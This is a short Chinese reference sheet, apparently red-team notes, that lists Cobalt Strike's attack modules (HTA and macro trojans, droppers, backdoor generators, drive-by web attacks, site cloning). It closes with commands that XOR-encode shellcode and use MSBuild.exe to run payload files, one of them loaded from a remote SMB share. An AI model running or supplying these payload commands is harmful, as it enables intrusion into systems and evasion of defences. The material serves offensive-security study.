攻击模块

image

名称 功能
HTML Application 基于powershell的.hta格式的HTML Application木马,分为可执行文件、PowerShell、VBA三种方法
MS Office Macro office宏病毒文件
Payload Generator 基于C、C#、COM Scriptlet、Java、Perl、PowerShell、Python、Ruby、VBA等语言的payload
USB/CD AutoPlay 利用USB/CD自动播放运行的木马
Windows Dropper 捆绑器
Windows Executable 生成32位或64位的exe和基于服务的可执行文件、DLL等后门
Windows Executable(S) 生成可执行文件,支持powershell脚本,提供代理功能
Web Drive-by基于WEB的攻击模块
名称 功能
Manage 管理开启的模块
Clone Site 克隆网站
Host File 提供文件下载
Scripted Web Delivery 基于Web的攻击Payload
Signed Applet Attack 运行java自签名的攻击模块
Smart Applet Attack 自动检测Java版本并利用已知的exploits攻击
System Profiler 信息探测模块
自定义payload
* Attacks > Packages > Payload Generator 
* Attacks > Packages > Scripted Web Delivery (S)
$ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor
$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml
$ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml